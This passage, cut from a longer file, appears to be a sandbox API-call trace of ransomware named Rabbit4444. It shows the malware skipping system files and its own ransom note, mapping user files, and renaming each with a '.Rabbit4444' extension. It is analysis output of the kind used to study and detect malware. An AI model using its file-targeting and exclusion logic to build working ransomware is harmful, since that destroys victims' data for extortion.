(lpString1="Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.498] lstrcmpiW (lpString1="Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.498] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms" | out: lpString1="Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms") returned="Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms" [0058.498] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.498] lstrlenW (lpString="Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms") returned 64 [0058.498] lstrlenW (lpString="Rabbit4444") returned 10 [0058.498] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.498] lstrlenW (lpString=".dll") returned 4 [0058.498] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.498] lstrlenW (lpString=".lnk") returned 4 [0058.498] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.498] lstrlenW (lpString=".ini") returned 4 [0058.498] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.498] lstrlenW (lpString=".sys") returned 4 [0058.498] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.498] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{2b6fe85a-c7aa-440f-b9a3-3f5edca3f6c2}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.499] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.499] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14980951956) returned 1 [0058.499] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=945) returned 1 [0058.499] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0058.499] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0058.499] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x298 [0058.500] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0x70000 [0058.501] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.501] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0058.501] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.501] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0058.501] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0058.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0058.502] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14981250904) returned 1 [0058.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0058.502] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0058.502] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.502] CloseHandle (hObject=0x298) returned 1 [0058.502] CloseHandle (hObject=0x278) returned 1 [0058.502] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms.Rabbit4444") returned 192 [0058.502] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{2b6fe85a-c7aa-440f-b9a3-3f5edca3f6c2}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{2B6FE85A-C7AA-440F-B9A3-3F5EDCA3F6C2}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{2b6fe85a-c7aa-440f-b9a3-3f5edca3f6c2}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.503] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47d29387, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x47d29387, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23078eee, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms", cAlternateFileName="CLAB0B~1.SET")) returned 1 [0058.503] lstrcmpiW (lpString1="Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.503] lstrcmpiW (lpString1="Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.503] lstrcmpiW (lpString1="Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.503] lstrcmpiW (lpString1="Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms", lpString2=".") returned 1 [0058.503] lstrcmpiW (lpString1="Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms", lpString2="..") returned 1 [0058.503] lstrcmpiW (lpString1="Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms", lpString2="windows") returned -1 [0058.503] lstrcmpiW (lpString1="Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.503] lstrcmpiW (lpString1="Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.503] lstrcmpiW (lpString1="Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms", lpString2="boot") returned 1 [0058.503] lstrcmpiW (lpString1="Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.503] lstrcmpiW (lpString1="Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.503] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms" | out: lpString1="Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms") returned="Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms" [0058.503] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.504] lstrlenW (lpString="Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms") returned 64 [0058.504] lstrlenW (lpString="Rabbit4444") returned 10 [0058.504] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.504] lstrlenW (lpString=".dll") returned 4 [0058.504] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.504] lstrlenW (lpString=".lnk") returned 4 [0058.504] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.504] lstrlenW (lpString=".ini") returned 4 [0058.504] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.504] lstrlenW (lpString=".sys") returned 4 [0058.504] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.504] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{2d06d17b-2a5f-4835-af30-6d2d58a4a66c}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.504] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.504] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14981511397) returned 1 [0058.504] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=982) returned 1 [0058.504] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0058.504] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0058.505] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0058.506] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0058.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0058.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0058.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.507] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14981760111) returned 1 [0058.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0058.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0058.507] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.507] CloseHandle (hObject=0x298) returned 1 [0058.507] CloseHandle (hObject=0x278) returned 1 [0058.507] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms.Rabbit4444") returned 192 [0058.507] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{2d06d17b-2a5f-4835-af30-6d2d58a4a66c}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{2D06D17B-2A5F-4835-AF30-6D2D58A4A66C}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{2d06d17b-2a5f-4835-af30-6d2d58a4a66c}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.508] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e808a4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x47e808a4, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2241abe6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms", cAlternateFileName="CL4A6D~1.SET")) returned 1 [0058.508] lstrcmpiW (lpString1="Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.508] lstrcmpiW (lpString1="Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.508] lstrcmpiW (lpString1="Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.508] lstrcmpiW (lpString1="Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms", lpString2=".") returned 1 [0058.508] lstrcmpiW (lpString1="Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms", lpString2="..") returned 1 [0058.508] lstrcmpiW (lpString1="Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms", lpString2="windows") returned -1 [0058.508] lstrcmpiW (lpString1="Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.508] lstrcmpiW (lpString1="Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.508] lstrcmpiW (lpString1="Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms", lpString2="boot") returned 1 [0058.508] lstrcmpiW (lpString1="Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.508] lstrcmpiW (lpString1="Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.508] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms" | out: lpString1="Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms") returned="Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms" [0058.508] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.509] lstrlenW (lpString="Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms") returned 64 [0058.509] lstrlenW (lpString="Rabbit4444") returned 10 [0058.509] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.509] lstrlenW (lpString=".dll") returned 4 [0058.509] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.509] lstrlenW (lpString=".lnk") returned 4 [0058.509] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.509] lstrlenW (lpString=".ini") returned 4 [0058.509] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.509] lstrlenW (lpString=".sys") returned 4 [0058.509] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.509] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{30137454-0e1f-43bb-9cb8-aef452964b0b}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.509] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.509] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14982006613) returned 1 [0058.509] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=937) returned 1 [0058.509] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0058.509] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0058.509] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x298 [0058.513] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x70000 [0058.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0058.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0058.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0058.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0058.514] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14982462046) returned 1 [0058.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0058.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0058.514] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.514] CloseHandle (hObject=0x298) returned 1 [0058.514] CloseHandle (hObject=0x278) returned 1 [0058.514] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms.Rabbit4444") returned 192 [0058.514] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{30137454-0e1f-43bb-9cb8-aef452964b0b}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{30137454-0E1F-43bb-9CB8-AEF452964B0B}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{30137454-0e1f-43bb-9cb8-aef452964b0b}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.515] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47f19295, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x47f19295, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23183f67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x418, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms", cAlternateFileName="CL23A4~1.SET")) returned 1 [0058.515] lstrcmpiW (lpString1="Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.515] lstrcmpiW (lpString1="Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.515] lstrcmpiW (lpString1="Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.515] lstrcmpiW (lpString1="Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms", lpString2=".") returned 1 [0058.515] lstrcmpiW (lpString1="Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms", lpString2="..") returned 1 [0058.515] lstrcmpiW (lpString1="Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms", lpString2="windows") returned -1 [0058.515] lstrcmpiW (lpString1="Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.515] lstrcmpiW (lpString1="Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.515] lstrcmpiW (lpString1="Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms", lpString2="boot") returned 1 [0058.515] lstrcmpiW (lpString1="Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.515] lstrcmpiW (lpString1="Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.515] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms" | out: lpString1="Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms") returned="Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms" [0058.515] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.516] lstrlenW (lpString="Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms") returned 64 [0058.516] lstrlenW (lpString="Rabbit4444") returned 10 [0058.516] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.516] lstrlenW (lpString=".dll") returned 4 [0058.516] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.516] lstrlenW (lpString=".lnk") returned 4 [0058.516] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.516] lstrlenW (lpString=".ini") returned 4 [0058.516] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.516] lstrlenW (lpString=".sys") returned 4 [0058.516] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.516] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{31DD3DA1-ED44-4BA8-A67B-6EA93DEA77E7}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{31dd3da1-ed44-4ba8-a67b-6ea93dea77e7}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.516] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.516] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14982702679) returned 1 [0058.516] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1048) returned 1 [0058.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0058.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0058.516] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x720, lpName=0x0) returned 0x298 [0058.518] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x720) returned 0x70000 [0058.519] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.519] 